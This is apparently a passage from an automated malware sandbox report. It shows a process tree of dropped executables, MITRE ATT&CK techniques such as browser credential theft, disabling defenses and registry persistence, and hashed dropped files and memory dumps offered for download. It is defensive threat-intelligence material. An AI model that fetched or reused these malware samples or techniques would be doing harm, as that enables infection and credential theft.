                                "C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:3452
                                • C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3512
                                • C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:3520
                                  • C:\Users\Admin\AppData\Roaming\zTtfgzgam0.exe
                                    "C:\Users\Admin\AppData\Roaming\zTtfgzgam0.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    PID:3644
                                  • C:\Users\Admin\AppData\Roaming\98JWpiisq2.exe
                                    "C:\Users\Admin\AppData\Roaming\98JWpiisq2.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3660
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 3660 -s 776
                                      9⤵
                                        PID:3328
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3452 -s 512
                                    7⤵
                                    • Loads dropped DLL
                                    • Program crash
                                    PID:3584
                                • C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  PID:2736
                                  • C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:1596
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 500
                                    7⤵
                                    • Loads dropped DLL
                                    • Program crash
                                    PID:3112

                      Network

                      MITRE ATT&CK Enterprise v15

                      Reconnaissance

                      Resource Development

                      Initial Access

                      Execution

                      Command and Scripting Interpreter

                      1
                      T1059

                      PowerShell

                      1
                      T1059.001

                      Scheduled Task/Job

                      1
                      T1053

                      Scheduled Task

                      1
                      T1053.005

                      Persistence

                      Boot or Logon Autostart Execution

                      1
                      T1547

                      Registry Run Keys / Startup Folder

                      1
                      T1547.001

                      Create or Modify System Process

                      4
                      T1543

                      Windows Service

                      4
                      T1543.003

                      Scheduled Task/Job

                      1
                      T1053

                      Scheduled Task

                      1
                      T1053.005

                      Privilege Escalation

                      Boot or Logon Autostart Execution

                      1
                      T1547

                      Registry Run Keys / Startup Folder

                      1
                      T1547.001

                      Create or Modify System Process

                      4
                      T1543

                      Windows Service

                      4
                      T1543.003

                      Scheduled Task/Job

                      1
                      T1053

                      Scheduled Task

                      1
                      T1053.005

                      Defense Evasion

                      Impair Defenses

                      5
                      T1562

                      Disable or Modify Tools

                      5
                      T1562.001

                      Modify Registry

                      8
                      T1112

                      Subvert Trust Controls

                      1
                      T1553

                      Install Root Certificate

                      1
                      T1553.004

                      Virtualization/Sandbox Evasion

                      2
                      T1497

                      Credential Access

                      Credentials from Password Stores

                      1
                      T1555

                      Credentials from Web Browsers

                      1
                      T1555.003

                      Unsecured Credentials

                      5
                      T1552

                      Credentials In Files

                      5
                      T1552.001

                      Discovery

                      Browser Information Discovery

                      1
                      T1217

                      Query Registry

                      6
                      T1012

                      System Information Discovery

                      3
                      T1082

                      System Location Discovery

                      1
                      T1614

                      System Language Discovery

                      1
                      T1614.001

                      Virtualization/Sandbox Evasion

                      2
                      T1497

                      Lateral Movement

                      Collection

                      Data from Local System

                      4
                      T1005

                      Command and Control

                      Exfiltration

                      Impact

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\C119990BFD470039.dat
                        Filesize

                        46KB

                        MD5

                        02d2c46697e3714e49f46b680b9a6b83

                        SHA1

                        84f98b56d49f01e9b6b76a4e21accf64fd319140

                        SHA256

                        522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

                        SHA512

                        60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

                        Download Submit

                      • C:\Temp\BvIzlcQOD.hta
                        Filesize

                        779B

                        MD5

                        39c8cd50176057af3728802964f92d49

                        SHA1

                        68fc10a10997d7ad00142fc0de393fe3500c8017

                        SHA256

                        f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

                        SHA512

                        cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                        Download Submit

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                        Filesize

                        71KB

                        MD5

                        83142242e97b8953c386f988aa694e4a

                        SHA1

                        833ed12fc15b356136dcdd27c61a50f59c5c7d50

                        SHA256

                        d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                        SHA512

                        bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7BQ20K5D\soft[1]
                        Filesize

                        987KB

                        MD5

                        f49d1aaae28b92052e997480c504aa3b

                        SHA1

                        a422f6403847405cee6068f3394bb151d8591fb5

                        SHA256

                        81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

                        SHA512

                        41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6J4GCMD\service[1].htm
                        Filesize

                        1B

                        MD5

                        cfcd208495d565ef66e7dff9f98764da

                        SHA1

                        b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                        SHA256

                        5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                        SHA512

                        31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\activity-stream.discovery_stream.json.tmp
                        Filesize

                        26KB

                        MD5

                        2844ca306c5d853185550573f27f26f3

                        SHA1

                        a26e4d4e08b690f25c9f179f085422f77eded972

                        SHA256

                        f46aeb507bb18a6d792137f7fb96b327a8bcbc7191679fda24aab70d4ee2d324

                        SHA512

                        7eb38395bebaa4411807b91cd826483254c171b0d3c3a816ed2554ee4f5d00d45d9d8f241d2c495a8fb3e0f1113e4a34958f97e8bb45c318794f18caf7ef428e

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
                        Filesize

                        15KB

                        MD5

                        96c542dec016d9ec1ecc4dddfcbaac66

                        SHA1

                        6199f7648bb744efa58acf7b96fee85d938389e4

                        SHA256

                        7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                        SHA512

                        cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104610101\25a04a2d7b.exe
                        Filesize

                        938KB

                        MD5

                        b94f9347051a717bd369cee684b7eb6f

                        SHA1

                        a0dc3fecc0cb6d49ac3dfec4a7a906e98f74eb63

                        SHA256

                        d0a694d2cff80fa6c782801d761f9d5ab6fb458b0b8e9b87eef548914f716177

                        SHA512

                        43a46c6747d5db0573bd8c2705ceb52bb7c4e9e6e49d85c3dada9864648be84cc4d7e2cf0908463a58dab6742ce2155eca7e7cdf1a070f04cca497adfda2206a

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd
                        Filesize

                        1KB

                        MD5

                        cedac8d9ac1fbd8d4cfc76ebe20d37f9

                        SHA1

                        b0db8b540841091f32a91fd8b7abcd81d9632802

                        SHA256

                        5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

                        SHA512

                        ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
                        Filesize

                        712KB

                        MD5

                        222ca959c06f62e99567723d7a0b82c2

                        SHA1

                        7bedfc54b4480250463716b19cc9842ad18adfc5

                        SHA256

                        ceee1236c696b7bf0710c5a11021d3c99f11a47895ff29613baf2f3f4e6b933b

                        SHA512

                        0b68f8e0781b1d0ca16e8800e7ba9eee4c35079734f11f91e37e457edad36185e84fbce4f1ca9d498d0d199d6f1e6ede28173882095de5f0378a4bb1f3d616e1

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104850101\fd91aeb028.exe
                        Filesize

                        3.7MB

                        MD5

                        4769a99eadbd516c17b7f4c541b87003

                        SHA1

                        cfe5a9970182cf428919e9f110a63df37d0eee06

                        SHA256

                        446ee955b11dbd350c8d44825c88d7846cf6c88c1604b1908739b2ec8b1cfc3e

                        SHA512

                        36146efedbf0780bc6fe459f5c649549b79e79c3908593cc1471f6ed2bd79e1348353d2861a48364aaa86dd5c1a59f7d874811c4c5bcc843e459230c7afb0a91

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104860101\141c83b051.exe
                        Filesize

                        445KB

                        MD5

                        c83ea72877981be2d651f27b0b56efec

                        SHA1

                        8d79c3cd3d04165b5cd5c43d6f628359940709a7

                        SHA256

                        13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482

                        SHA512

                        d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104870101\e81eff42e0.exe
                        Filesize

                        4.5MB

                        MD5

                        96dd38daadfd80cf699a8c087b581ab9

                        SHA1

                        ccea87fbad5d9fdea11ecedfd7f3d0b2d2ff3b2c

                        SHA256

                        ad659d3cd67b4c566ada6bc6dfbeece67e5b1941585fbc480bdd80daf290a110

                        SHA512

                        9862debc204be49700c1025ab9556a2b082890fae9e43ec9b7c7d41ed1db801601e48b51c755679b4035a4af7019b159451bc356769bd432b1173c15a10423ab

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104880101\fc259c3d14.exe
                        Filesize

                        1.8MB

                        MD5

                        bde9a6abcb6323c95e4912af1dec9174

                        SHA1

                        d732600d2bd0c05fbe4eb5e0f5320e1b45e7cc6a

                        SHA256

                        c374a12d72f69efe4f1df4b8a40efdf0b3a3ff7c82d1e6f246ed32181701f699

                        SHA512

                        dc4005df7bac77f96941b632a3cf18ace120b0b70a8d0749e5d657ac8f19fe4864bb9dc93e6c96dd06ce7036c7cf9fcb66cd56516a73d75992c2f17a53a2e2c3

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104890101\23401e2b1c.exe
                        Filesize

                        3.0MB

                        MD5

                        54b30d5072b09ae0b55ca89c3d6cea5f

                        SHA1

                        22459531f94d2c64f9adf316a4aa1e2c63ef8fe5

                        SHA256

                        4b2bb17bfd3ec355a70605cb5a1971d098ccd1f92f0a47386e9166b223bb551f

                        SHA512

                        5bdba7bc41d20c515bd58fcb7ceb67feadbd582c4ffeec426e1e370d105dde08c9d7f6ecf362066accc03bd80ebe94ccea7ad284d0e622e449dfe0d77272ff5c

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
                        Filesize

                        48KB

                        MD5

                        d39df45e0030e02f7e5035386244a523

                        SHA1

                        9ae72545a0b6004cdab34f56031dc1c8aa146cc9

                        SHA256

                        df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2

                        SHA512

                        69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104920101\7c161f386c.exe
                        Filesize

                        3.0MB

                        MD5

                        3d020a1f3a39cbf3cc5388fc44c98d0e

                        SHA1

                        ca89df7cf0e6624d22885bd5caa4a952e9cf0c08

                        SHA256

                        e5fec111044aa2eb782e39a5332e067cf911a6fa1fe55eaaa446df1a0d5655b7

                        SHA512

                        b3a68853b082eeda17ef41b9c1763d487f778967d348a3de8c47a81d9550fcbbaffaec8e584d3b661d815abd653d5d5b27fdf7879dc061b7c22d164a2cfd7300

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104930101\590fcbc813.exe
                        Filesize

                        1.7MB

                        MD5

                        78dd1277431fc66e855e72022c860e27

                        SHA1

                        0bba63575a0912d00e91963f2b77303f30861978

                        SHA256

                        ab15b22d550865e2bf810c040cc4ec118c9c161cc7ab74d597fda7a31873f17c

                        SHA512

                        37af33de6d0410d68aaffe17ee01c83793e6f6be0bb87b63af3be98951fca4bb518241244d0c6d6181ca5c9a024c97e8ad6076173150d3e968fea600a7bd29a1

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104940101\63af54f7b0.exe
                        Filesize

                        949KB

                        MD5

                        593a33280543acef8878ad91a3cdcee2

                        SHA1

                        00cf7c13ae63fbe16847ebbad71f4baf0a266c5e

                        SHA256

                        1a9ebb0cb706ac093e516c09b3bcce07ff9cc4f6291564788105e66b0561f563

                        SHA512

                        5645dd4c6edbb759f9332fd60d20731b7faecc7e8dadaa7ef078f4dd0cc9dbd39a81b276a2b916bc9240b97fe224a6d0b77cf4674c3f2ac9f30d8e00d5912c56

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104950101\90076af2a4.exe
                        Filesize

                        1.7MB

                        MD5

                        98ee4896338ef74dab5e7c33ddcc9351

                        SHA1

                        25d21fc6a6a559d3c669eae75cc4a5472ed7af77

                        SHA256

                        96c7ccf3d949db0cc6d64ebaa6133a8dd21cd3931c4b72e2ba4e15584bdebfa1

                        SHA512

                        f67f2fac33be4e9cae733131ab4d5c14c51bdc40f27ab2017ae66c3f7970bf81556e037ecdf73df0fe457f19dedfc87670839c25bb88ddeaadada1a22e13c48b

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe
                        Filesize

                        30.4MB

                        MD5

                        158f22bd8c5c1c37f7ecd4ea7ffed06d

                        SHA1

                        8f25c9a5e8204ad7bba72750cab8a896425ef01a

                        SHA256

                        624c9457f49d82a1f167f00529665259cdcc30ac7995eb8dd36e23cf5cfd2510

                        SHA512

                        2639510edb67caecb57f0cc6fadc72af7d409c84c4d8cc740dc0b8dfc5c682d6c4e8a79db2b279b69d436fee278262b97495588c3130b44362d8c425f4b13a9d

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe
                        Filesize

                        350KB

                        MD5

                        b60779fb424958088a559fdfd6f535c2

                        SHA1

                        bcea427b20d2f55c6372772668c1d6818c7328c9

                        SHA256

                        098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221

                        SHA512

                        c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\5O6m4Aci3.hta
                        Filesize

                        717B

                        MD5

                        4cf3b20e5dd686deb4fb105779e3632e

                        SHA1

                        2083eb98fe184ca88f3004d27a03bcf72b69f11b

                        SHA256

                        96dd1ad96f89199f6643eebb824e5053bddb413449b7d729981d1193c43e9bd8

                        SHA512

                        67acc41c07d22080fbfb4fe6c132f29fa39a2f911ec2097ae68314eb72bbb77123178e3cc24503875ee7bf1d08fec8cf6855e5be540555b0ecc0b596656f68fd

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\TarB40A.tmp
                        Filesize

                        183KB

                        MD5

                        109cab5505f5e065b63d01361467a83b

                        SHA1

                        4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

                        SHA256

                        ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

                        SHA512

                        753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\eBj8pOrnF.hta
                        Filesize

                        717B

                        MD5

                        ed966743807d835ed68bd2f8f68ee4db

                        SHA1

                        92878cfec23ba1feb0538724d734326b5d32d2e6

                        SHA256

                        cda02a5800132116e62ce2a4c310366c3b55fd904cb073d1601fc232f18e3c52

                        SHA512

                        9861ac97d83b8f6ad1bec24dd4f299195df8c1c7827ce38011d9f22691d38ff61a6bf448a4584f629079d97aaaf8d42c7506102f9e835ee36bd05fe68b1c0bf0

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                        Filesize

                        7KB

                        MD5

                        f36129b04b7b8fabfa4d716b6317e40e

                        SHA1

                        0039712c325f61c7fd15570ebe0b49eb69d416f4

                        SHA256

                        828b423c53ab7839f74e0c0e0d265a1ea2bc38b9c10e62707b3c76f2bb71a266

                        SHA512

                        63dfb423b76f208dd3713ba78a55a62cd99f71eed1809a0f6a6cc2c22d1a808d9e374bd2c2d74cbc86effabb418ba34d03400d37d96854ce12c77ad2de090b32

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\db\data.safe.bin
                        Filesize

                        2KB

                        MD5

                        abe12f763e5178d48e3bc1ecf407b02f

                        SHA1

                        d0ffc376143badb4fb51b823e079f1d7ade01b77

                        SHA256

                        3bc24dd97802514691ff04d935454614efc49f5ab67a5381d816ce3716ab5f3e

                        SHA512

                        2e5d581df8c51e915ed680f24eef3593d55bb413e33e43fb2f6174d4a1fc42d244d1ee614782d7f82f273a882579fcfc1f6f824b2726e6f1c33a09114717b38b

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\db\data.safe.bin
                        Filesize

                        2KB

                        MD5

                        6bf93c0399178c9cc0572d2e0c275f7c

                        SHA1

                        f5e878346bdef5ba1befa762c86c447c5346af53

                        SHA256

                        c06c7ef26c504362850d34e8386e06e689d01cd8ec7fe467ea3e91ee7c4ebffe

                        SHA512

                        7c065aad9a2a54712e931547728362a2691e31af6d6a0fe178a12c321ec85ed4c1771bf0d3288cc5bbe6bba8515cdb6be3a35c61a2e364901dba28c0aff2c661

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\pending_pings\af4d1448-8f8e-4fda-bd56-7206d82c3163
                        Filesize

                        745B

                        MD5

                        0b0a3a36057789a5fb9081d18b9817d9

                        SHA1

                        e8948d7b2778949e59d84d4bff48a1712f04de09

                        SHA256

                        b91e0c31466e4d44ae7d651993a410278967cc424cd75139deced11bdf08cdbf

                        SHA512

                        2c1944eb41a5f488add97842963c9877484c3e1e736858fd2c5eca4089777d2f0a8945536b3d83d80fad1c2607feeacf44665c6ec69e6715fae3fbd2ca26fc43

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\pending_pings\b5c848f3-2152-4039-827f-54f69b1a3171
                        Filesize

                        11KB

                        MD5

                        f2fd72f04fdcb70349112f54c6b6d693

                        SHA1

                        2084a892ff7c7c5729fb9376503ea6a08416c930

                        SHA256

                        e34168d716f17f451ea6bd37ff8d2b5754c6059e79f3b01bbb641c647f84bfa2

                        SHA512

                        e8f3ac37d1d098e0f313293a0faa08d8938be63dc5cd88801f14ad8214c95aef14c3d2b57443352372422205b3a5c0fe52b75f4e52d87a70196644e497c131a2

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\favicons.sqlite-wal
                        Filesize

                        160KB

                        MD5

                        2a21131b32440e596f261c7f97d2fc8f

                        SHA1

                        c77a2cc72198a243b47cf85bc29b52d03b8b6f1b

                        SHA256

                        c0bad2344adde380ec651bde0ff95d8a5eaeceae5ab0cab73fa26cc75c3e8730

                        SHA512

                        cefbb9ac2c8d8f5217dd29e50613573b617248c1d9eae9d0a0041509aad2965c8f042e1d0aad63ddc169acabf0dc18b38567002e4be1af47a9edbb400e051947

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\places.sqlite-wal
                        Filesize

                        1.4MB

                        MD5

                        ec35707682248a7033d1c4ae2f39640c

                        SHA1

                        58ed395c900bc3169bc99dea62d5cc0408dc955a

                        SHA256

                        f1b44518a41aca27408827a3d27c04789a22300f524f4376fba2e8055ded41fc

                        SHA512

                        d67741fce58bae1be72716824c3981c4a01f48587cb4dbf63590db98db57428d796f8f908aa3772c44438bb3ffa9e6c4bb9923e3b3bf9b9ec6586b7db1840be5

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs-1.js
                        Filesize

                        6KB

                        MD5

                        227046c9f51844db412e966792d5dd46

                        SHA1

                        c2c8f7890c65f9cb409c3c501d7bc6de1379abc1

                        SHA256

                        df4d06f47e177f7440c1178dd0fb401ae7c32e16ef91f8dc4e5e689aa0d33eea

                        SHA512

                        3b4cecc6401b0d5ef1fbf9e08197e60556ff9b921f13119f0fe780a7be7d4d4098b4b06b2e112cafb6c2d543800c133906cbcb020e3c87c6fa8e8743388a78a5

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs.js
                        Filesize

                        6KB

                        MD5

                        44c3b2e9dcefc30bb88a79184c4ffeea

                        SHA1

                        4b2efa3d61cf189a3e7ad913744b941c5e1da42a

                        SHA256

                        44c89c60aee1748f28a1623f6c0db35d926ca62d6d841a8264bb836a1ff81c62

                        SHA512

                        bd8b0f4296aa0a8d3e3805448aa251b7931f5459802c811c4f187958069eb415e2b270a9d0c62bd6b2b6347e1fa62e1073a151a6596137d3521e80b3031311bb

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs.js
                        Filesize

                        6KB

                        MD5

                        6735aa70bff10709aca8527aa87f79f2

                        SHA1

                        565dc8bbf7a7ccf58a589ef27ff8edeef733d78f

                        SHA256

                        824245b586f005da41c71143525c68c3f5a11f81ed01eccf941d5690cb5031b9

                        SHA512

                        462a99a91a222beb0890fccb135d15d1c97dcc54e5df1f2c499499c427781df2babd309ee5775243cc7f921984f973babf2068582dc3aec510c5be6118f1aca7

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\sessionstore-backups\recovery.jsonlz4
                        Filesize

                        4KB

                        MD5

                        d4cbe3ccb150171f6ee040fcd4576e8e

                        SHA1

                        7994fbbaa786273cc7e77c28f80954e49499c086

                        SHA256

                        f976555c20530c70465f6f26771cecb46039f49ae9c48cab632d13a3bfd8b9a7

                        SHA512

                        4e943d4224e18c2d486855c6595d75f1979aff1902d16f33b5dccc3b6520c8f4ee8a484198b30f78cf3f127d382a32dfb1fa7449362bed27f9f697a2c4516a48

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\qZLzlyV9Ne.exe
                        Filesize

                        18KB

                        MD5

                        f3edff85de5fd002692d54a04bcb1c09

                        SHA1

                        4c844c5b0ee7cb230c9c28290d079143e00cb216

                        SHA256

                        caf29650446db3842e1c1e8e5e1bafadaf90fc82c5c37b9e2c75a089b7476131

                        SHA512

                        531d920e2567f58e8169afc786637c1a0f7b9b5c27b27b5f0eddbfc3e00cecd7bea597e34061d836647c5f8c7757f2fe02952a9793344e21b39ddd4bf7985f9d

                        Download Submit

                      • \Users\Admin\AppData\Local\TempN0YLF0SZTWBIWIIVCTXBO8R82X2LF9HZ.EXE
                        Filesize

                        1.8MB

                        MD5

                        23d6a88e50671a2d79a5fec5da38c672

                        SHA1

                        d6ef750dab0728778055b3807473115b3c779862

                        SHA256

                        aff49262b1924db1dc4c875a41f382c1a8266350ebb044d61692f9f73a558cdd

                        SHA512

                        4d7e55454ff0915b829bdba9708a7c05c702fb6e2615a8e6a20b529be2aab5b2b9c6ee0f8ceed128a741717178b3c870e259054d877d382591ee3907aa69c560

                        Download Submit

                      • \Users\Admin\AppData\Roaming\udorB5ZSMp.exe
                        Filesize

                        138KB

                        MD5

                        137e3a65922a769e161f6241fc4800a5

                        SHA1

                        4260d6197fff6a2816363f66d4782a3e14c2c8f4

                        SHA256

                        4a7e9eb31388ea24cf203e005dfaf80be2fb2c8160d5fb0c3038ad553d27756c

                        SHA512

                        5d91fe6507e01cdbd0e5edf244c086cb9dee5e46296bf7128e63a1f8f0e6d87c9aa02d770cbe1e2d247078b44275d7f055c94f43d37a61a43d045efdaf4e6569

                        Download Submit

                      • memory/644-243-0x0000000010000000-0x000000001001C000-memory.dmp

                        Filesize

                        112KB

                        Download

                      • memory/644-236-0x0000000000400000-0x000000000042F000-memory.dmp

                        Filesize

                        188KB

                        Download

                      • memory/644-238-0x0000000000400000-0x000000000042F000-memory.dmp

                        Filesize

                        188KB

                        Download

                      • memory/680-234-0x00000000001F0000-0x0000000000BDD000-memory.dmp

                        Filesize

                        9.9MB

                        Download

                      • memory/680-191-0x00000000001F0000-0x0000000000BDD000-memory.dmp

                        Filesize

                        9.9MB

                        Download

                      • memory/680-235-0x00000000001F0000-0x0000000000BDD000-memory.dmp

                        Filesize

                        9.9MB

                        Download

                      • memory/680-239-0x00000000001F0000-0x0000000000BDD000-memory.dmp

                        Filesize

                        9.9MB

                        Download

                      • memory/876-169-0x0000000006550000-0x0000000006A19000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/876-171-0x0000000006550000-0x0000000006A19000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/988-405-0x0000000000960000-0x0000000000DF6000-memory.dmp

                        Filesize

                        4.6MB

                        Download

                      • memory/1144-464-0x0000000000A90000-0x0000000000D9D000-memory.dmp

                        Filesize

                        3.1MB

                        Download

                      • memory/1612-287-0x0000000000400000-0x000000000042F000-memory.dmp

                        Filesize

                        188KB

                        Download

                      • memory/1880-81-0x0000000000390000-0x0000000000859000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/1880-83-0x0000000000390000-0x0000000000859000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/1960-158-0x0000000000150000-0x0000000000178000-memory.dmp

                        Filesize

                        160KB

                        Download

                      • memory/2096-9-0x00000000064F0000-0x00000000069B9000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/2148-435-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/2148-159-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/2148-232-0x0000000006960000-0x000000000734D000-memory.dmp

                        Filesize

                        9.9MB

                        Download

                      • memory/2148-420-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/2148-465-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/2148-188-0x0000000006960000-0x000000000734D000-memory.dmp

                        Filesize

                        9.9MB

                        Download

                      • memory/2148-189-0x0000000006960000-0x000000000734D000-memory.dmp

                        Filesize

                        9.9MB

                        Download

                      • memory/2148-262-0x0000000006960000-0x00000000075A5000-memory.dmp

                        Filesize

                        12.3MB

                        Download

                      • memory/2148-265-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/2148-660-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/2148-30-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/2148-283-0x0000000006960000-0x00000000075A5000-memory.dmp

                        Filesize

                        12.3MB

                        Download

                      • memory/2148-39-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/2148-233-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                        Download

                      • memory/2148-173-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                        Download

